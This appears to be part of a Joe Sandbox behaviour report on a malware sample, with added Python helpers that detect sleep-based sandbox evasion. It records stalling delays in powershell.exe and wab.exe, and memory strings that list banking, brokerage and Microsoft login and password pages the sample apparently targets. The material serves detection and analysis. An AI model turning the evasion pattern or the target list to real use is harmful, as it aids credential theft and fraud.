          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 597312
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 597199
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 597078
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 596964
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 596856
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 596746
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 596605
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 596439
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 596312
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 596202
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 596078
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 595968
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 595859
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 595748
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 595625
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 595515
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 595406
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 595297
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 595187
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 595077
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 594953
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 594843
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 594729
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 594621
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 594515
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 594406
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 594295
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 594178
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 594034
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 593921
          Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 593812
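The Thread delayed values for wab.exe above descend from 600000 ms in steps of roughly 110 ms. One reading, offered here as an inference rather than something the report states, is a loop that sleeps until a fixed deadline, wakes, re-reads the clock and sleeps again for the remainder, so the step between consecutive requests is the wall-clock time the process actually saw pass between two sleep calls, far less than the ten minutes it asked for each time. The separate value 922337203685477 is TimeSpan.MaxValue expressed in whole milliseconds (Int64.MaxValue ticks of 100 ns), which is what a .NET Thread.Sleep(TimeSpan.MaxValue), an effectively infinite sleep, records as. The following is an added Python example, not part of the report or of Joe Sandbox, that classifies a list of recorded delays into these two patterns; the step bound is an assumed tuning value and the sample list is constructed from the first ten delays listed above.

```python
"""Added example: classify sandbox-recorded Thread-delay values into sleep-evasion patterns."""
from statistics import median
from typing import List, Optional, Tuple

# .NET TimeSpan ticks are 100 ns, so TimeSpan.MaxValue (Int64.MaxValue ticks) is this many whole ms.
DOTNET_TIMESPAN_MAX_MS = (2**63 - 1) // 10_000  # 922337203685477

# Constructed from the report: the first ten "Thread delayed" values of wab.exe listed above.
SAMPLE_DELAYS_MS: List[int] = [600000, 599890, 599781, 599671, 599558,
                               599437, 599326, 599215, 599105, 598929]


def is_max_timespan(delay_ms: int) -> bool:
    """True for the 922337203685477 ms sentinel, i.e. Thread.Sleep(TimeSpan.MaxValue): sleep forever."""
    return delay_ms == DOTNET_TIMESPAN_MAX_MS


def countdown_profile(delays: List[int], max_step_ms: int = 500
                      ) -> Tuple[bool, Optional[int], Optional[int], Optional[int]]:
    """Return (is_countdown, deadline_ms, median_step_ms, observed_elapsed_ms).

    A countdown is a strictly decreasing run with small, fairly regular steps.
    Interpretation (an inference, not a statement from the report): each pass asks
    to sleep until a fixed deadline, returns early, re-reads the clock and sleeps
    again for what is left, so each step is the wall-clock time the process really
    observed between two sleep calls. max_step_ms is an assumed jitter bound."""
    if len(delays) < 3:
        return (False, None, None, None)
    steps = [a - b for a, b in zip(delays, delays[1:])]
    if any(s <= 0 or s > max_step_ms for s in steps):
        return (False, None, None, None)
    return (True, delays[0], int(median(steps)), delays[0] - delays[-1])


def sleep_honoured_ratio(delays: List[int]) -> Optional[float]:
    """Observed step divided by the typical requested sleep. Near 1.0 means the
    sleeps really elapsed; a tiny ratio means each request returned after only a
    fraction of the time asked for and the code noticed and re-armed."""
    ok, _, step, _ = countdown_profile(delays)
    if not ok:
        return None
    return step / median(delays[:-1])


def classify(delays: List[int]) -> List[str]:
    labels = []
    if any(is_max_timespan(d) for d in delays):
        labels.append("max_timespan_sleep")
    if countdown_profile(delays)[0]:
        labels.append("deadline_countdown")
    return labels


if __name__ == "__main__":
    print(classify(SAMPLE_DELAYS_MS), countdown_profile(SAMPLE_DELAYS_MS))
    print("honoured ratio:", sleep_honoured_ratio(SAMPLE_DELAYS_MS))
    print(classify([DOTNET_TIMESPAN_MAX_MS]))
```

For a detection engineer the ratio is the telling number: a program that merely sleeps for ten minutes shows one delay, while one that keeps re-arming for the remainder after each early return is measuring the clock, and a sequence of near-identical small steps against six-digit requests is that measurement made visible.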
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7069
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2705
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Window / User API: threadDelayed 6148
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Window / User API: threadDelayed 3670
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1564 | Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576 | Thread sleep count: 32 > 30
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576 | Thread sleep time: -29514790517935264s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576 | Thread sleep time: -600000s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2916 | Thread sleep count: 6148 > 30
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2916 | Thread sleep count: 3670 > 30
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576 | Thread sleep time: -599890s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576 | Thread sleep time: -599781s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576 | Thread sleep time: -599671s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576 | Thread sleep time: -599558s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576 | Thread sleep time: -599437s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576 | Thread sleep time: -599326s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576 | Thread sleep time: -599215s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576 | Thread sleep time: -599105s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576 | Thread sleep time: -598929s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576 | Thread sleep time: -598812s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576 | Thread sleep time: -598702s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576 | Thread sleep time: -598578s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576 | Thread sleep time: -598468s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576 | Thread sleep time: -598359s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576 | Thread sleep time: -598250s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576 | Thread sleep time: -598138s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576 | Thread sleep time: -598015s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576 | Thread sleep time: -597905s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576 | Thread sleep time: -597796s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576 | Thread sleep time: -597656s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576 | Thread sleep time: -597544s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576 | Thread sleep time: -597422s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576 | Thread sleep time: -597312s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576 | Thread sleep time: -597199s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576 | Thread sleep time: -597078s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576 | Thread sleep time: -596964s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576 | Thread sleep time: -596856s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576 | Thread sleep time: -596746s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576 | Thread sleep time: -596605s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576 | Thread sleep time: -596439s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576 | Thread sleep time: -596312s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576 | Thread sleep time: -596202s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576 | Thread sleep time: -596078s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576 | Thread sleep time: -595968s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576 | Thread sleep time: -595859s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576 | Thread sleep time: -595748s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576 | Thread sleep time: -595625s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576 | Thread sleep time: -595515s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576 | Thread sleep time: -595406s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576 | Thread sleep time: -595297s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576 | Thread sleep time: -595187s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576 | Thread sleep time: -595077s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576 | Thread sleep time: -594953s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576 | Thread sleep time: -594843s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576 | Thread sleep time: -594729s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576 | Thread sleep time: -594621s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576 | Thread sleep time: -594515s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576 | Thread sleep time: -594406s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576 | Thread sleep time: -594295s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576 | Thread sleep time: -594178s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576 | Thread sleep time: -594034s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576 | Thread sleep time: -593921s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5576 | Thread sleep time: -593812s >= -30000s
Source: C:\Users\user\Desktop\Apixaban - August 2024.exe | Code function: 0_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\Apixaban - August 2024.exe | Code function: 0_2_0040622B FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\Apixaban - August 2024.exe | Code function: 0_2_0040276E FindFirstFileW
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (0x7FFFFFFFFFFFFFFF 100-ns ticks rendered in ms, i.e. an INFINITE wait)
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 922337203685477 (INFINITE wait, as above)
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 600000
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 599890
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 599781
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 599671
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 599558
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 599437
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 599326
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 599215
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 599105
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 598929
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 598812
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 598702
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 598578
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 598468
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 598359
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 598250
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 598138
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 598015
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 597905
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 597796
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 597656
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 597544
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 597422
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 597312
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 597199
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 597078
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 596964
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 596856
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 596746
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 596605
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 596439
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 596312
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 596202
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 596078
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 595968
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 595859
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 595748
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 595625
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 595515
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 595406
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 595297
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 595187
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 595077
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 594953
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 594843
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 594729
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 594621
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 594515
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 594406
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 594295
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 594178
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 594034
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 593921
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread delayed: delay time: 593812
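The two delay lists above (the wab.exe "Thread delayed" entries and the TID 5576 "Thread sleep time" entries) record the same behaviour from two angles: one effectively infinite wait per process, plus a 600000 ms deadline that is re-requested in roughly 110 ms decrements. That decreasing series is what a sleep-until-deadline loop looks like when the sandbox cuts each Sleep short: the malware re-reads the clock and asks for the remainder, so skipping individual sleeps does not shorten the stall. The following Python is an added triage helper, not part of this Joe Sandbox report or of Joe Sandbox's tooling. It parses evidence lines in the format shown on this page (both the fused extracted form and a cleaned "Source: ... | ..." form), separates infinite waits from finite delays, detects countdown runs, and applies the report's own 3-minute threshold. The sample lines are constructed from the lists above; reading 922337203685477 as Int64.MaxValue 100-ns ticks expressed in milliseconds is inferred from the value, not stated by the report.

```python
from __future__ import annotations

import re
from dataclasses import dataclass, field

# 0x7FFFFFFFFFFFFFFF 100-ns ticks expressed in milliseconds: the value the
# report shows for an INFINITE wait (inference from the number, see lead-in).
INFINITE_MS = (2**63 - 1) // 10_000          # 922337203685477

SRC_RE = re.compile(r"Source:\s*(.+?\.exe)", re.IGNORECASE)
DELAY_RE = re.compile(r"Thread delayed: delay time:\s*(\d+)")
SLEEP_RE = re.compile(r"Thread sleep time:\s*-(\d+)s\s*>=\s*-\d+s")

# Constructed sample, abridged from the lists above. The fused
# "wab.exeThread delayed" form is kept on purpose so the parser copes with
# the extracted text as well as a cleaned-up version.
SAMPLE_EVIDENCE = """\
Source: C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\\Program Files (x86)\\Windows Mail\\wab.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\\Program Files (x86)\\Windows Mail\\wab.exe | Thread delayed: delay time: 600000
Source: C:\\Program Files (x86)\\Windows Mail\\wab.exe | Thread delayed: delay time: 599890
Source: C:\\Program Files (x86)\\Windows Mail\\wab.exe | Thread delayed: delay time: 599781
Source: C:\\Program Files (x86)\\Windows Mail\\wab.exe | Thread delayed: delay time: 599671
Source: C:\\Program Files (x86)\\Windows Mail\\wab.exe TID: 5576Thread sleep time: -599558s >= -30000sJump to behavior
"""


@dataclass
class StallSummary:
    process: str
    infinite_waits: int = 0
    finite_delays_ms: list[int] = field(default_factory=list)
    # (first value, last value, number of calls) per decreasing run
    countdown_runs: list[tuple[int, int, int]] = field(default_factory=list)

    @property
    def longest_ms(self) -> int:
        return max(self.finite_delays_ms, default=0)


def parse_delays(text: str) -> dict[str, list[int]]:
    """Return {process basename: [delay values in ms, in report order]}."""
    per_proc: dict[str, list[int]] = {}
    for line in text.splitlines():
        src = SRC_RE.search(line)
        if not src:
            continue
        proc = src.group(1).rsplit("\\", 1)[-1].lower()
        m = DELAY_RE.search(line) or SLEEP_RE.search(line)
        if m:
            per_proc.setdefault(proc, []).append(int(m.group(1)))
    return per_proc


def find_countdowns(values, max_step_ms: int = 1000, min_len: int = 3):
    """Group consecutive finite delays that shrink by at most max_step_ms per
    call: a loop that sleeps until a fixed deadline and re-requests the
    remaining time after each (possibly shortened) Sleep."""
    finite = [v for v in values if v < INFINITE_MS]
    runs, i = [], 0
    while i < len(finite):
        j = i
        while j + 1 < len(finite) and 0 < finite[j] - finite[j + 1] <= max_step_ms:
            j += 1
        if j - i + 1 >= min_len:
            runs.append((finite[i], finite[j], j - i + 1))
        i = j + 1
    return runs


def summarize(text: str) -> dict[str, StallSummary]:
    out: dict[str, StallSummary] = {}
    for proc, vals in parse_delays(text).items():
        out[proc] = StallSummary(
            process=proc,
            infinite_waits=sum(1 for v in vals if v >= INFINITE_MS),
            finite_delays_ms=[v for v in vals if v < INFINITE_MS],
            countdown_runs=find_countdowns(vals),
        )
    return out


def is_stalling(s: StallSummary, threshold_ms: int = 180_000) -> bool:
    """Mirror the report's 'Contains long sleeps (>= 3 min)' verdict, and also
    treat an INFINITE wait or a countdown loop as stalling."""
    return s.infinite_waits > 0 or s.longest_ms >= threshold_ms or bool(s.countdown_runs)


if __name__ == "__main__":
    for s in summarize(SAMPLE_EVIDENCE).values():
        print(f"{s.process}: infinite={s.infinite_waits} longest={s.longest_ms} ms "
              f"countdowns={s.countdown_runs} stalling={is_stalling(s)}")
```

The countdown step of 1000 ms is deliberately loose: the decrements on this page are about 110 ms, which is the granularity at which the sandbox returned from each Sleep, but another sandbox (or a real host with no sleep patching) will show different spacing. When running this over a full report, note that Joe Sandbox lists the same event under several signatures, so one countdown can appear twice.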
Source: wab.exe, 0000000A.00000002.2654624146.000000002626A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: wab.exe, 0000000A.00000002.2654624146.0000000026589000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: wab.exe, 0000000A.00000002.2654624146.000000002626A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696494690
Source: wab.exe, 0000000A.00000002.2654624146.000000002626A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: wab.exe, 0000000A.00000002.2654624146.0000000026589000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: wab.exe, 0000000A.00000002.2654624146.000000002626A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: wab.exe, 0000000A.00000002.2654624146.000000002626A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: wab.exe, 0000000A.00000002.2654624146.000000002626A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: wab.exe, 0000000A.00000002.2654624146.000000002626A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: wab.exe, 0000000A.00000002.2640536687.00000000096A5000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2640536687.0000000009638000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: wab.exe, 0000000A.00000002.2654624146.0000000026589000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696494690
Source: wab.exe, 0000000A.00000002.2654624146.0000000026589000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: wab.exe, 0000000A.00000002.2654624146.0000000026589000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: wab.exe, 0000000A.00000002.2654624146.0000000026589000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: wab.exe, 0000000A.00000002.2654624146.000000002626A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696494690o
Source: wab.exe, 0000000A.00000002.2654624146.000000002626A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: wab.exe, 0000000A.00000002.2654624146.000000002626A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: wab.exe, 0000000A.00000002.2654624146.0000000026589000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: wab.exe, 0000000A.00000002.2654624146.000000002626A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696494690
Source: wab.exe, 0000000A.00000002.2654624146.000000002626A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: wab.exe, 0000000A.00000002.2654624146.000000002626A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: wab.exe, 0000000A.00000002.2654624146.000000002626A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: wab.exe, 0000000A.00000002.2654624146.000000002626A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: wab.exe, 0000000A.00000002.2654624146.000000002626A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: wab.exe, 0000000A.00000002.2654624146.000000002626A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: wab.exe, 0000000A.00000002.2654624146.0000000026589000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
Source: wab.exe, 0000000A.00000002.2654624146.0000000026589000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: wab.exe, 0000000A.00000002.2654624146.000000002626A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: wab.exe, 0000000A.00000002.2654624146.000000002626A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
Source: wab.exe, 0000000A.00000002.2654624146.000000002626A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696494690f
Source: wab.exe, 0000000A.00000002.2654624146.0000000026589000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: wab.exe, 0000000A.00000002.2654624146.000000002626A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696494690s
Source: wab.exe, 0000000A.00000002.2654624146.0000000026589000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: wab.exe, 0000000A.00000002.2654624146.000000002626A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: wab.exe, 0000000A.00000002.2654624146.000000002626A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: wab.exe, 0000000A.00000002.2654624146.0000000026589000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: wab.exe, 0000000A.00000002.2654624146.0000000026589000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: wab.exe, 0000000A.00000002.2654624146.0000000026589000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: wab.exe, 0000000A.00000002.2654624146.0000000026589000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: wab.exe, 0000000A.00000002.2654624146.000000002626A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: wab.exe, 0000000A.00000002.2654624146.0000000026589000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696494690o
Source: wab.exe, 0000000A.00000002.2654624146.0000000026589000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696494690j
Source: wab.exe, 0000000A.00000002.2654624146.0000000026589000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: wab.exe, 0000000A.00000002.2654624146.000000002626A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: wab.exe, 0000000A.00000002.2654624146.0000000026589000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
